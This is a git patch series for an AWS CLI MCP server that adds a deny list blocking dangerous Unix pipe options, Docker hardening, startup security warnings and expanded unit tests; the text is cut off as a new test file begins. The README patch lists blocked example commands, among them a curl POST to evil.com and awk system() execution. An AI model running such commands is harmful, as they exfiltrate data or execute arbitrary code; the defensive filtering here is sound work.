From 2eae26f15387c6abee8a134a9457d8a8ac56c7d3 Mon Sep 17 00:00:00 2001 From: Claude Date: Tue, 25 Nov 2025 06:23:35 +0000 Subject: [PATCH 1/3] security: Enhance security model with dangerous pattern validation - Add dangerous option validation for Unix commands (awk, find, sed, xargs, curl, wget, rm, chmod, chown) - Block awk system() and shell piping, find -exec/-delete, xargs entirely, sed /e commands - Block curl/wget POST requests to prevent data exfiltration - Add Docker environment detection and security warnings at startup - Warn when running in permissive mode or outside Docker - Enhance docker-compose with read_only, no-new-privileges, cap_drop ALL - Fix README documentation (previously incorrectly stated shell=True) - Document Unix command injection prevention in README --- README.md | 52 +++++++++++-- deploy/docker/docker-compose.yml | 11 ++- src/aws_mcp_server/config.py | 61 +++++++++++++++ src/aws_mcp_server/security.py | 15 +++- src/aws_mcp_server/server.py | 8 +- src/aws_mcp_server/tools.py | 129 ++++++++++++++++++++++++++++++- 6 files changed, 259 insertions(+), 17 deletions(-) diff --git a/README.md b/README.md index f2121d7..83da2af 100644 --- a/README.md +++ b/README.md @@ -133,14 +133,16 @@ Security is paramount when executing commands against your AWS environment. Whil * The server assumes the end-user interacting with the MCP client (e.g., Claude Desktop, Cursor) is the **same trusted individual** who configured the server and provided the least-privilege AWS credentials. Do not expose the server or connected client to untrusted users. -**4. Understanding Execution Risks (Current Implementation)** +**4. Understanding Execution Risks** -* **Command Execution:** The current implementation uses shell features (`shell=True` in subprocess calls) to execute AWS commands and handle Unix pipes. While convenient, this approach carries inherent risks if the input command string were manipulated (command injection). -* **Mitigation via Operational Controls:** In the context of the **trusted user model** and **Docker deployment**, these risks are mitigated operationally: - * The trusted user is assumed not to provide intentionally malicious commands against their own environment. - * Docker contains filesystem side-effects. - * **Crucially, IAM least privilege limits the scope of *any* AWS action that could be executed.** -* **Credential Exfiltration Risk:** Despite containerization and IAM, a sophisticated command injection could potentially attempt to read the mounted credentials (`~/.aws`) or environment variables within the container and exfiltrate them (e.g., via `curl`). **Strict IAM policies remain the most vital defense** to limit the value of potentially exfiltrated credentials. +* **Command Execution:** The implementation uses safe subprocess execution (`asyncio.create_subprocess_exec`) which avoids shell injection vulnerabilities by not using `shell=True`. Commands are split using `shlex.split()` and executed with proper argument separation. +* **Command Validation:** All commands pass through a multi-layer security validation system that blocks dangerous operations before execution. +* **Unix Pipe Support:** When using pipes, each command in the chain is validated separately. The first command must be an AWS CLI command, and subsequent commands must be from a whitelist of allowed Unix utilities. +* **Residual Risks in Non-Docker Deployments:** + * Without Docker isolation, piped commands like `curl`, `wget` could potentially be misused for data exfiltration + * Filesystem commands (`rm`, `mv`, etc.) could affect the host system + * **Docker deployment is strongly recommended** to contain these risks +* **Credential Security:** Despite containerization, credentials mounted or passed via environment variables could potentially be accessed within the container. **Strict IAM policies remain the most vital defense** to limit the value of potentially compromised credentials. **5. Network Exposure (SSE Transport)** @@ -368,7 +370,9 @@ The server validates all AWS CLI commands through a three-layer system: 3. **Pipe Command Security**: - Validates Unix commands used in pipes - Restricts commands to a safe allowlist - - Prevents filesystem manipulation and arbitrary command execution + - Prevents arbitrary command execution + + **Note on Unix Commands**: The allowed Unix commands include networking tools (`curl`, `wget`, `ssh`) and filesystem commands (`rm`, `mv`) that are useful for AWS workflows but could potentially be misused. **Docker deployment is strongly recommended** as it isolates these operations from your host system. When running outside Docker, the server logs a security warning at startup. ### Default Security Configuration @@ -422,6 +426,38 @@ Many read-only operations that match these patterns are explicitly allowed via s - All help commands (`--help`, `help`) - Simulation and testing commands (e.g., `aws iam simulate-custom-policy`) +#### 5. Unix Command Injection Prevention + +Unix commands in pipes are validated for dangerous options that could enable arbitrary code execution: + +| Command | Blocked Patterns | Security Risk | +|---------|-----------------|---------------| +| `awk` | `system(`, `getline`, `\|"` | Shell command execution via awk | +| `find` | `-exec`, `-execdir`, `-delete` | Arbitrary command execution on files | +| `xargs` | (all usage blocked) | Designed to execute commands with piped input | +| `sed` | `/e`, `;e` | GNU sed can execute shell commands | +| `curl` | `-X POST`, `--data`, `-T` | Data exfiltration via HTTP POST/upload | +| `wget` | `--post-data`, `--post-file` | Data exfiltration via HTTP POST | +| `rm` | `-rf /`, `--no-preserve-root` | Destructive file system operations | +| `chmod`/`chown` | Paths starting with `/etc`, `/usr` | System file permission changes | + +**Examples of blocked commands:** +```bash +# These pipe commands will be BLOCKED: +aws s3 ls | awk 'BEGIN{system("malicious_command")}' # awk system() blocked +aws ec2 describe-instances | find . -exec rm {} \; # find -exec blocked +aws s3 ls | xargs anything # xargs completely blocked +aws s3 ls | curl -X POST http://evil.com -d @- # curl POST blocked +``` + +**Examples of allowed commands:** +```bash +# These pipe commands are ALLOWED: +aws s3 ls | grep backup | sort # Safe text processing +aws ec2 describe-instances | jq '.Reservations[]' # Safe JSON processing +aws s3 ls | head -10 | tail -5 # Safe output limiting +``` + ### Configuration Options - **Security Modes**: diff --git a/deploy/docker/docker-compose.yml b/deploy/docker/docker-compose.yml index 1194bcb..1bf4221 100644 --- a/deploy/docker/docker-compose.yml +++ b/deploy/docker/docker-compose.yml @@ -9,12 +9,21 @@ services: ports: - "8000:8000" volumes: - - ~/.aws://home/appuser/.aws:ro # Mount AWS credentials as read-only + - ~/.aws:/home/appuser/.aws:ro # Mount AWS credentials as read-only environment: - AWS_PROFILE=default # Specify default AWS profile - AWS_MCP_TIMEOUT=300 # Default timeout in seconds (5 minutes) - AWS_MCP_TRANSPORT=stdio # Transport protocol ("stdio" or "sse") # - AWS_MCP_MAX_OUTPUT=100000 # Uncomment to set max output size + # Security hardening options + read_only: true # Make container filesystem read-only + tmpfs: + - /tmp:size=64M,mode=1777 # Temporary storage for any runtime needs + - /app/logs:size=32M,mode=1777 # Writable logs directory + security_opt: + - no-new-privileges:true # Prevent privilege escalation + cap_drop: + - ALL # Drop all Linux capabilities restart: unless-stopped # To build multi-architecture images: # 1. Set up Docker buildx: docker buildx create --name mybuilder --use diff --git a/src/aws_mcp_server/config.py b/src/aws_mcp_server/config.py index 1f813d4..02a5515 100644 --- a/src/aws_mcp_server/config.py +++ b/src/aws_mcp_server/config.py @@ -13,9 +13,12 @@ - AWS_MCP_SECURITY_CONFIG: Path to custom security configuration file """ +import logging import os from pathlib import Path +logger = logging.getLogger(__name__) + # Command execution settings DEFAULT_TIMEOUT = int(os.environ.get("AWS_MCP_TIMEOUT", "300")) MAX_OUTPUT_SIZE = int(os.environ.get("AWS_MCP_MAX_OUTPUT", "100000")) @@ -77,3 +80,61 @@ # Application paths BASE_DIR = Path(__file__).parent.parent.parent + + +def is_running_in_docker() -> bool: + """Detect if the application is running inside a Docker container. + + Returns: + True if running in Docker, False otherwise + """ + # Check for .dockerenv file (present in most Docker containers) + if Path("/.dockerenv").exists(): + return True + + # Check cgroup for docker/containerd signatures + try: + with open("/proc/1/cgroup", "r") as f: + cgroup_content = f.read() + if "docker" in cgroup_content or "containerd" in cgroup_content: + return True + except (FileNotFoundError, PermissionError): + pass + + # Check for container environment variable (often set in container runtimes) + if os.environ.get("container"): + return True + + return False + + +def check_security_warnings() -> None: + """Log security warnings for potentially risky configurations. + + This function checks the runtime environment and logs appropriate + warnings about security implications. + """ + # Check if running in Docker + in_docker = is_running_in_docker() + + if not in_docker: + logger.warning( + "SECURITY WARNING: Running outside Docker container. " + "Docker deployment is strongly recommended for security isolation. " + "Without Docker, piped commands (curl, wget, rm, etc.) can affect " + "the host filesystem and potentially exfiltrate data. " + "See README.md Security Considerations for details." + ) + + # Check for permissive security mode + if SECURITY_MODE.lower() == "permissive": + logger.warning( + "SECURITY WARNING: Running in PERMISSIVE security mode. " + "Dangerous commands will be logged but NOT blocked. " + "This mode should only be used for testing/development. " + "Set AWS_MCP_SECURITY_MODE=strict for production use." + ) + + # Log security status + if in_docker and SECURITY_MODE.lower() == "strict": + logger.info("Security: Running in Docker with strict mode - recommended configuration") diff --git a/src/aws_mcp_server/security.py b/src/aws_mcp_server/security.py index e35a5ad..551971c 100644 --- a/src/aws_mcp_server/security.py +++ b/src/aws_mcp_server/security.py @@ -16,9 +16,10 @@ from aws_mcp_server.config import SECURITY_CONFIG_PATH, SECURITY_MODE from aws_mcp_server.tools import ( + ALLOWED_UNIX_COMMANDS, + check_dangerous_patterns, is_pipe_command, split_pipe_command, - validate_unix_command, ) logger = logging.getLogger(__name__) @@ -546,8 +547,16 @@ def validate_pipe_command(pipe_command: str) -> None: if not cmd_parts: raise ValueError(f"Empty command at position {i} in pipe") - if not validate_unix_command(cmd): - raise ValueError(f"Command '{cmd_parts[0]}' at position {i} in pipe is not allowed. Only AWS commands and basic Unix utilities are permitted.") + cmd_name = cmd_parts[0] + + # Check if command is in the allowed list + if cmd_name not in ALLOWED_UNIX_COMMANDS: + raise ValueError(f"Command '{cmd_name}' at position {i} in pipe is not allowed. Only AWS commands and basic Unix utilities are permitted.") + + # Check for dangerous patterns in the command + dangerous_error = check_dangerous_patterns(cmd, cmd_name) + if dangerous_error: + raise ValueError(f"Security violation at position {i} in pipe: {dangerous_error}. This command option is blocked for security reasons.") logger.debug(f"Pipe command validation successful: {pipe_command}") diff --git a/src/aws_mcp_server/server.py b/src/aws_mcp_server/server.py index df3e1c3..3540015 100644 --- a/src/aws_mcp_server/server.py +++ b/src/aws_mcp_server/server.py @@ -22,7 +22,7 @@ execute_aws_command, get_command_help, ) -from aws_mcp_server.config import INSTRUCTIONS +from aws_mcp_server.config import INSTRUCTIONS, check_security_warnings from aws_mcp_server.prompts import register_prompts from aws_mcp_server.resources import register_resources @@ -33,8 +33,12 @@ # Run startup checks in synchronous context def run_startup_checks(): - """Run startup checks to ensure AWS CLI is installed.""" + """Run startup checks to ensure AWS CLI is installed and security is configured.""" logger.info("Running startup checks...") + + # Check security configuration and environment + check_security_warnings() + if not asyncio.run(check_aws_cli_installed()): logger.error("AWS CLI is not installed or not in PATH. Please install AWS CLI.") sys.exit(1) diff --git a/src/aws_mcp_server/tools.py b/src/aws_mcp_server/tools.py index d6b706f..1ab004c 100644 --- a/src/aws_mcp_server/tools.py +++ b/src/aws_mcp_server/tools.py @@ -16,7 +16,19 @@ # Configure module logger logger = logging.getLogger(__name__) -# List of allowed Unix commands that can be used in a pipe +# List of allowed Unix commands that can be used in a pipe. +# +# Security Note: These commands are whitelisted for legitimate AWS CLI output +# processing. Some commands (curl, wget, ssh, rm, etc.) could potentially be +# misused in non-Docker deployments. Docker deployment is strongly recommended +# as it provides filesystem and network isolation. The server logs a security +# warning at startup when running outside Docker. +# +# Categories: +# - Text processing (grep, sed, awk, jq): Essential for parsing AWS CLI output +# - File operations (cat, ls, head, tail): Reading and displaying data +# - Networking (curl, wget, ssh): Legitimate AWS workflows (downloading, EC2 access) +# - System info (ps, df, du): Diagnostic information ALLOWED_UNIX_COMMANDS = [ # File operations "cat", @@ -83,21 +95,132 @@ class CommandResult(TypedDict): output: str +# Dangerous patterns in Unix commands that could be exploited for arbitrary code execution +# or other security issues. These patterns are checked against the full command string. +DANGEROUS_UNIX_PATTERNS: dict[str, list[str]] = { + # awk can execute shell commands via system() and can pipe to shell + "awk": [ + "system(", # system() function executes shell commands + "getline", # getline can read from commands via pipe + '|"', # Pipe to shell + '"\\|', # Pipe to shell (escaped) + '| "', # Pipe to shell with space + ], + # find can execute arbitrary commands via -exec and -delete + "find": [ + "-exec", # Execute commands on found files + "-execdir", # Execute commands in file's directory + "-ok", # Execute with confirmation (still dangerous) + "-okdir", # Execute in directory with confirmation + "-delete", # Delete found files + ], + # xargs executes commands with piped arguments - inherently dangerous + "xargs": [ + "", # Block all xargs usage - it's designed to execute commands + ], + # sed can execute commands in some versions via the 'e' command + "sed": [ + "/e", # Execute pattern space as shell command (GNU sed) + " e", # Execute command flag + ";e", # Execute after other command + ], + # curl/wget data exfiltration via POST/upload + "curl": [ + "-X POST", # POST requests could exfiltrate data + "--data", # POST data + "-d ", # POST data shorthand + "--upload-file", # Upload files + "-T ", # Upload shorthand + "-F ", # Form data upload + "--form", # Form data upload + ], + "wget": [ + "--post-data", # POST requests + "--post-file", # POST file contents + "--body-data", # Request body + "--body-file", # Request body from file + ], + # rm with dangerous flags + "rm": [ + "-rf /", # Recursive force delete from root + "-rf /*", # Recursive force delete everything + "-rf ~", # Recursive force delete home + "--no-preserve-root", # Allow deleting root + ], + # chmod/chown on sensitive paths + "chmod": [ + " /", # Modifying root or system files + " /etc", + " /usr", + " /bin", + " /sbin", + ], + "chown": [ + " /", # Modifying root or system files + " /etc", + " /usr", + " /bin", + " /sbin", + ], +} + + +def check_dangerous_patterns(command: str, cmd_name: str) -> str | None: + """Check if a command contains dangerous patterns. + + Args: + command: The full command string to check + cmd_name: The name of the Unix command + + Returns: + Error message if dangerous pattern found, None otherwise + """ + if cmd_name not in DANGEROUS_UNIX_PATTERNS: + return None + + patterns = DANGEROUS_UNIX_PATTERNS[cmd_name] + command_lower = command.lower() + + for pattern in patterns: + # Empty pattern means block all usage of this command + if pattern == "": + return f"Command '{cmd_name}' is not allowed in pipes due to security risks" + + if pattern.lower() in command_lower: + return f"Dangerous pattern '{pattern}' detected in {cmd_name} command" + + return None + + def validate_unix_command(command: str) -> bool: """Validate that a command is an allowed Unix command. + This function checks both the command name against the allowlist + and validates that no dangerous options/patterns are present. + Args: command: The Unix command to validate Returns: - True if the command is valid, False otherwise + True if the command is valid and safe, False otherwise """ cmd_parts = shlex.split(command) if not cmd_parts: return False + cmd_name = cmd_parts[0] + # Check if the command is in the allowed list - return cmd_parts[0] in ALLOWED_UNIX_COMMANDS + if cmd_name not in ALLOWED_UNIX_COMMANDS: + return False + + # Check for dangerous patterns in specific commands + error = check_dangerous_patterns(command, cmd_name) + if error: + logger.warning(f"Blocked dangerous Unix command: {error}") + return False + + return True def is_pipe_command(command: str) -> bool: From f133a13e043da640d4be36a9611bbce76668a4b9 Mon Sep 17 00:00:00 2001 From: Alexei Ledenev Date: Tue, 25 Nov 2025 20:11:16 +0200 Subject: [PATCH 2/3] test: improve test coverage from 69% to 97% - Add test_config.py with Docker detection and security warning tests - Add tests for ValueError handling in cli_executor.py - Add tests for permissive mode and pattern matching in security.py - Add tests for dangerous pattern detection in tools.py - Fix test_validate_pipe_command to use current implementation --- tests/unit/test_cli_executor.py | 252 ++++++++++++++++++++++++++------ tests/unit/test_config.py | 82 +++++++++++ tests/unit/test_security.py | 167 ++++++++++++++++----- tests/unit/test_tools.py | 93 ++++++++++-- 4 files changed, 505 insertions(+), 89 deletions(-) create mode 100644 tests/unit/test_config.py diff --git a/tests/unit/test_cli_executor.py b/tests/unit/test_cli_executor.py index d370139..0aa3f2f 100644 --- a/tests/unit/test_cli_executor.py +++ b/tests/unit/test_cli_executor.py @@ -20,7 +20,9 @@ @pytest.mark.asyncio async def test_execute_aws_command_success(): """Test successful command execution.""" - with patch("asyncio.create_subprocess_exec", new_callable=AsyncMock) as mock_subprocess: + with patch( + "asyncio.create_subprocess_exec", new_callable=AsyncMock + ) as mock_subprocess: # Mock a successful process process_mock = AsyncMock() process_mock.returncode = 0 @@ -31,13 +33,21 @@ async def test_execute_aws_command_success(): assert result["status"] == "success" assert result["output"] == "Success output" - mock_subprocess.assert_called_once_with("aws", "s3", "ls", stdout=asyncio.subprocess.PIPE, stderr=asyncio.subprocess.PIPE) + mock_subprocess.assert_called_once_with( + "aws", + "s3", + "ls", + stdout=asyncio.subprocess.PIPE, + stderr=asyncio.subprocess.PIPE, + ) @pytest.mark.asyncio async def test_execute_aws_command_ec2_with_region_added(): """Test that region is automatically added to EC2 commands.""" - with patch("asyncio.create_subprocess_exec", new_callable=AsyncMock) as mock_subprocess: + with patch( + "asyncio.create_subprocess_exec", new_callable=AsyncMock + ) as mock_subprocess: # Mock a successful process process_mock = AsyncMock() process_mock.returncode = 0 @@ -66,7 +76,9 @@ async def test_execute_aws_command_ec2_with_region_added(): @pytest.mark.asyncio async def test_execute_aws_command_with_custom_timeout(): """Test command execution with custom timeout.""" - with patch("asyncio.create_subprocess_exec", new_callable=AsyncMock) as mock_subprocess: + with patch( + "asyncio.create_subprocess_exec", new_callable=AsyncMock + ) as mock_subprocess: process_mock = AsyncMock() process_mock.returncode = 0 process_mock.communicate.return_value = (b"Success output", b"") @@ -87,7 +99,9 @@ async def test_execute_aws_command_with_custom_timeout(): @pytest.mark.asyncio async def test_execute_aws_command_error(): """Test command execution error.""" - with patch("asyncio.create_subprocess_exec", new_callable=AsyncMock) as mock_subprocess: + with patch( + "asyncio.create_subprocess_exec", new_callable=AsyncMock + ) as mock_subprocess: # Mock a failed process process_mock = AsyncMock() process_mock.returncode = 1 @@ -108,7 +122,9 @@ async def test_execute_aws_command_error(): @pytest.mark.asyncio async def test_execute_aws_command_auth_error(): """Test command execution with authentication error.""" - with patch("asyncio.create_subprocess_exec", new_callable=AsyncMock) as mock_subprocess: + with patch( + "asyncio.create_subprocess_exec", new_callable=AsyncMock + ) as mock_subprocess: # Mock a process that returns auth error process_mock = AsyncMock() process_mock.returncode = 1 @@ -126,7 +142,9 @@ async def test_execute_aws_command_auth_error(): @pytest.mark.asyncio async def test_execute_aws_command_timeout(): """Test command timeout.""" - with patch("asyncio.create_subprocess_exec", new_callable=AsyncMock) as mock_subprocess: + with patch( + "asyncio.create_subprocess_exec", new_callable=AsyncMock + ) as mock_subprocess: # Mock a process that times out process_mock = AsyncMock() # Use a properly awaitable mock that raises TimeoutError @@ -150,7 +168,9 @@ async def test_execute_aws_command_timeout(): @pytest.mark.asyncio async def test_execute_aws_command_kill_failure(): """Test failure to kill process after timeout.""" - with patch("asyncio.create_subprocess_exec", new_callable=AsyncMock) as mock_subprocess: + with patch( + "asyncio.create_subprocess_exec", new_callable=AsyncMock + ) as mock_subprocess: # Mock a process that times out process_mock = AsyncMock() # Use a properly awaitable mock that raises TimeoutError @@ -170,7 +190,9 @@ async def test_execute_aws_command_kill_failure(): @pytest.mark.asyncio async def test_execute_aws_command_general_exception(): """Test handling of general exceptions during command execution.""" - with patch("asyncio.create_subprocess_exec", side_effect=Exception("Test exception")): + with patch( + "asyncio.create_subprocess_exec", side_effect=Exception("Test exception") + ): with pytest.raises(CommandExecutionError) as excinfo: await execute_aws_command("aws s3 ls") @@ -181,7 +203,9 @@ async def test_execute_aws_command_general_exception(): @pytest.mark.asyncio async def test_execute_aws_command_truncate_output(): """Test truncation of large outputs.""" - with patch("asyncio.create_subprocess_exec", new_callable=AsyncMock) as mock_subprocess: + with patch( + "asyncio.create_subprocess_exec", new_callable=AsyncMock + ) as mock_subprocess: # Mock a successful process with large output process_mock = AsyncMock() process_mock.returncode = 0 @@ -194,7 +218,9 @@ async def test_execute_aws_command_truncate_output(): result = await execute_aws_command("aws s3 ls") assert result["status"] == "success" - assert len(result["output"]) <= MAX_OUTPUT_SIZE + 100 # Allow for the truncation message + assert ( + len(result["output"]) <= MAX_OUTPUT_SIZE + 100 + ) # Allow for the truncation message assert "output truncated" in result["output"] @@ -233,14 +259,18 @@ def test_is_auth_error(error_message, expected_result): (None, None, None, Exception("Test exception"), False), ], ) -async def test_check_aws_cli_installed(returncode, stdout, stderr, exception, expected_result): +async def test_check_aws_cli_installed( + returncode, stdout, stderr, exception, expected_result +): """Test check_aws_cli_installed function with various scenarios.""" if exception: with patch("asyncio.create_subprocess_exec", side_effect=exception): result = await check_aws_cli_installed() assert result is expected_result else: - with patch("asyncio.create_subprocess_exec", new_callable=AsyncMock) as mock_subprocess: + with patch( + "asyncio.create_subprocess_exec", new_callable=AsyncMock + ) as mock_subprocess: process_mock = AsyncMock() process_mock.returncode = returncode process_mock.communicate.return_value = (stdout, stderr) @@ -249,8 +279,15 @@ async def test_check_aws_cli_installed(returncode, stdout, stderr, exception, ex result = await check_aws_cli_installed() assert result is expected_result - if returncode == 0: # Only verify call args for success case to avoid redundancy - mock_subprocess.assert_called_once_with("aws", "--version", stdout=asyncio.subprocess.PIPE, stderr=asyncio.subprocess.PIPE) + if ( + returncode == 0 + ): # Only verify call args for success case to avoid redundancy + mock_subprocess.assert_called_once_with( + "aws", + "--version", + stdout=asyncio.subprocess.PIPE, + stderr=asyncio.subprocess.PIPE, + ) @pytest.mark.asyncio @@ -258,20 +295,66 @@ async def test_check_aws_cli_installed(returncode, stdout, stderr, exception, ex "service,command,mock_type,mock_value,expected_text,expected_call", [ # Successful help retrieval with service and command - ("s3", "ls", "return_value", {"status": "success", "output": "Help text"}, "Help text", "aws s3 ls help"), + ( + "s3", + "ls", + "return_value", + {"status": "success", "output": "Help text"}, + "Help text", + "aws s3 ls help", + ), # Successful help retrieval with service only - ("s3", None, "return_value", {"status": "success", "output": "Help text for service"}, "Help text for service", "aws s3 help"), + ( + "s3", + None, + "return_value", + {"status": "success", "output": "Help text for service"}, + "Help text for service", + "aws s3 help", + ), # Error scenarios - ("s3", "ls", "side_effect", CommandValidationError("Test validation error"), "Command validation error: Test validation error", None), - ("s3", "ls", "side_effect", CommandExecutionError("Test execution error"), "Error retrieving help: Test execution error", None), - ("s3", "ls", "side_effect", Exception("Test exception"), "Error retrieving help: Test exception", None), + ( + "s3", + "ls", + "side_effect", + CommandValidationError("Test validation error"), + "Command validation error: Test validation error", + None, + ), + ( + "s3", + "ls", + "side_effect", + CommandExecutionError("Test execution error"), + "Error retrieving help: Test execution error", + None, + ), + ( + "s3", + "ls", + "side_effect", + Exception("Test exception"), + "Error retrieving help: Test exception", + None, + ), # Error result from AWS command - ("s3", "ls", "return_value", {"status": "error", "output": "Command failed"}, "Error: Command failed", "aws s3 ls help"), + ( + "s3", + "ls", + "return_value", + {"status": "error", "output": "Command failed"}, + "Error: Command failed", + "aws s3 ls help", + ), ], ) -async def test_get_command_help(service, command, mock_type, mock_value, expected_text, expected_call): +async def test_get_command_help( + service, command, mock_type, mock_value, expected_text, expected_call +): """Test get_command_help function with various scenarios.""" - with patch("aws_mcp_server.cli_executor.execute_aws_command", new_callable=AsyncMock) as mock_execute: + with patch( + "aws_mcp_server.cli_executor.execute_aws_command", new_callable=AsyncMock + ) as mock_execute: # Configure the mock based on the test case if mock_type == "return_value": mock_execute.return_value = mock_value @@ -294,8 +377,13 @@ async def test_execute_aws_command_with_pipe(): """Test execute_aws_command with a piped command.""" # Test that execute_aws_command calls execute_pipe_command for piped commands with patch("aws_mcp_server.cli_executor.is_pipe_command", return_value=True): - with patch("aws_mcp_server.cli_executor.execute_pipe_command", new_callable=AsyncMock) as mock_pipe_exec: - mock_pipe_exec.return_value = {"status": "success", "output": "Piped result"} + with patch( + "aws_mcp_server.cli_executor.execute_pipe_command", new_callable=AsyncMock + ) as mock_pipe_exec: + mock_pipe_exec.return_value = { + "status": "success", + "output": "Piped result", + } result = await execute_aws_command("aws s3 ls | grep bucket") @@ -308,8 +396,13 @@ async def test_execute_aws_command_with_pipe(): async def test_execute_pipe_command_success(): """Test successful execution of a pipe command.""" with patch("aws_mcp_server.cli_executor.validate_pipe_command") as mock_validate: - with patch("aws_mcp_server.cli_executor.execute_piped_command", new_callable=AsyncMock) as mock_pipe_exec: - mock_pipe_exec.return_value = {"status": "success", "output": "Filtered results"} + with patch( + "aws_mcp_server.cli_executor.execute_piped_command", new_callable=AsyncMock + ) as mock_pipe_exec: + mock_pipe_exec.return_value = { + "status": "success", + "output": "Filtered results", + } result = await execute_pipe_command("aws s3 ls | grep bucket") @@ -323,18 +416,28 @@ async def test_execute_pipe_command_success(): async def test_execute_pipe_command_ec2_with_region_added(): """Test that region is automatically added to EC2 commands in a pipe.""" with patch("aws_mcp_server.cli_executor.validate_pipe_command"): - with patch("aws_mcp_server.cli_executor.execute_piped_command", new_callable=AsyncMock) as mock_pipe_exec: - mock_pipe_exec.return_value = {"status": "success", "output": "Filtered EC2 instances"} + with patch( + "aws_mcp_server.cli_executor.execute_piped_command", new_callable=AsyncMock + ) as mock_pipe_exec: + mock_pipe_exec.return_value = { + "status": "success", + "output": "Filtered EC2 instances", + } # Mock split_pipe_command to simulate pipe command splitting with patch("aws_mcp_server.cli_executor.split_pipe_command") as mock_split: - mock_split.return_value = ["aws ec2 describe-instances", "grep instance-id"] + mock_split.return_value = [ + "aws ec2 describe-instances", + "grep instance-id", + ] # Import here to ensure the test uses the actual value from aws_mcp_server.config import AWS_REGION # Execute a piped EC2 command without region - result = await execute_pipe_command("aws ec2 describe-instances | grep instance-id") + result = await execute_pipe_command( + "aws ec2 describe-instances | grep instance-id" + ) assert result["status"] == "success" assert result["output"] == "Filtered EC2 instances" @@ -347,7 +450,10 @@ async def test_execute_pipe_command_ec2_with_region_added(): @pytest.mark.asyncio async def test_execute_pipe_command_validation_error(): """Test execute_pipe_command with validation error.""" - with patch("aws_mcp_server.cli_executor.validate_pipe_command", side_effect=CommandValidationError("Invalid pipe command")): + with patch( + "aws_mcp_server.cli_executor.validate_pipe_command", + side_effect=CommandValidationError("Invalid pipe command"), + ): with pytest.raises(CommandValidationError) as excinfo: await execute_pipe_command("invalid | pipe | command") @@ -358,7 +464,10 @@ async def test_execute_pipe_command_validation_error(): async def test_execute_pipe_command_execution_error(): """Test execute_pipe_command with execution error.""" with patch("aws_mcp_server.cli_executor.validate_pipe_command"): - with patch("aws_mcp_server.cli_executor.execute_piped_command", side_effect=Exception("Execution error")): + with patch( + "aws_mcp_server.cli_executor.execute_piped_command", + side_effect=Exception("Execution error"), + ): with pytest.raises(CommandExecutionError) as excinfo: await execute_pipe_command("aws s3 ls | grep bucket") @@ -373,14 +482,21 @@ async def test_execute_pipe_command_execution_error(): async def test_execute_pipe_command_timeout(): """Test timeout handling in piped commands.""" with patch("aws_mcp_server.cli_executor.validate_pipe_command"): - with patch("aws_mcp_server.cli_executor.execute_piped_command", new_callable=AsyncMock) as mock_exec: + with patch( + "aws_mcp_server.cli_executor.execute_piped_command", new_callable=AsyncMock + ) as mock_exec: # Simulate timeout in the executed command - mock_exec.return_value = {"status": "error", "output": f"Command timed out after {DEFAULT_TIMEOUT} seconds"} + mock_exec.return_value = { + "status": "error", + "output": f"Command timed out after {DEFAULT_TIMEOUT} seconds", + } result = await execute_pipe_command("aws s3 ls | grep bucket") assert result["status"] == "error" - assert f"Command timed out after {DEFAULT_TIMEOUT} seconds" in result["output"] + assert ( + f"Command timed out after {DEFAULT_TIMEOUT} seconds" in result["output"] + ) mock_exec.assert_called_once() @@ -388,11 +504,15 @@ async def test_execute_pipe_command_timeout(): async def test_execute_pipe_command_with_custom_timeout(): """Test piped command execution with custom timeout.""" with patch("aws_mcp_server.cli_executor.validate_pipe_command"): - with patch("aws_mcp_server.cli_executor.execute_piped_command", new_callable=AsyncMock) as mock_exec: + with patch( + "aws_mcp_server.cli_executor.execute_piped_command", new_callable=AsyncMock + ) as mock_exec: mock_exec.return_value = {"status": "success", "output": "Piped output"} custom_timeout = 120 - await execute_pipe_command("aws s3 ls | grep bucket", timeout=custom_timeout) + await execute_pipe_command( + "aws s3 ls | grep bucket", timeout=custom_timeout + ) # Verify the custom timeout was passed to the execute_piped_command mock_exec.assert_called_once_with("aws s3 ls | grep bucket", custom_timeout) @@ -402,7 +522,9 @@ async def test_execute_pipe_command_with_custom_timeout(): async def test_execute_pipe_command_large_output(): """Test handling of large output in piped commands.""" with patch("aws_mcp_server.cli_executor.validate_pipe_command"): - with patch("aws_mcp_server.cli_executor.execute_piped_command", new_callable=AsyncMock) as mock_exec: + with patch( + "aws_mcp_server.cli_executor.execute_piped_command", new_callable=AsyncMock + ) as mock_exec: # Generate large output that would be truncated large_output = "x" * (MAX_OUTPUT_SIZE + 1000) mock_exec.return_value = {"status": "success", "output": large_output} @@ -410,22 +532,38 @@ async def test_execute_pipe_command_large_output(): result = await execute_pipe_command("aws s3 ls | grep bucket") assert result["status"] == "success" - assert len(result["output"]) == len(large_output) # Length should be preserved here as truncation happens in tools module + assert len(result["output"]) == len( + large_output + ) # Length should be preserved here as truncation happens in tools module @pytest.mark.parametrize( "exit_code,stderr,expected_status,expected_msg", [ (0, b"", "success", ""), # Success case - (1, b"Error: bucket not found", "error", "Error: bucket not found"), # Standard error + ( + 1, + b"Error: bucket not found", + "error", + "Error: bucket not found", + ), # Standard error (1, b"AccessDenied", "error", "Authentication error"), # Auth error - (0, b"Warning: deprecated feature", "success", ""), # Warning on stderr but success exit code + ( + 0, + b"Warning: deprecated feature", + "success", + "", + ), # Warning on stderr but success exit code ], ) @pytest.mark.asyncio -async def test_execute_aws_command_exit_codes(exit_code, stderr, expected_status, expected_msg): +async def test_execute_aws_command_exit_codes( + exit_code, stderr, expected_status, expected_msg +): """Test handling of different process exit codes and stderr output.""" - with patch("asyncio.create_subprocess_exec", new_callable=AsyncMock) as mock_subprocess: + with patch( + "asyncio.create_subprocess_exec", new_callable=AsyncMock + ) as mock_subprocess: process_mock = AsyncMock() process_mock.returncode = exit_code stdout = b"Command output" if exit_code == 0 else b"" @@ -439,3 +577,29 @@ async def test_execute_aws_command_exit_codes(exit_code, stderr, expected_status assert result["output"] == "Command output" else: assert expected_msg in result["output"] + + +@pytest.mark.asyncio +async def test_execute_aws_command_validation_value_error(): + """Test that ValueError from validate_aws_command is converted to CommandValidationError.""" + with patch( + "aws_mcp_server.cli_executor.validate_aws_command", + side_effect=ValueError("Invalid AWS command"), + ): + with pytest.raises(CommandValidationError) as excinfo: + await execute_aws_command("invalid command") + + assert "Invalid AWS command" in str(excinfo.value) + + +@pytest.mark.asyncio +async def test_execute_pipe_command_value_error(): + """Test that ValueError from validate_pipe_command is converted to CommandValidationError.""" + with patch( + "aws_mcp_server.cli_executor.validate_pipe_command", + side_effect=ValueError("Invalid pipe command"), + ): + with pytest.raises(CommandValidationError) as excinfo: + await execute_pipe_command("aws s3 ls | unknown_cmd") + + assert "Invalid pipe command" in str(excinfo.value) diff --git a/tests/unit/test_config.py b/tests/unit/test_config.py new file mode 100644 index 0000000..1da97f8 --- /dev/null +++ 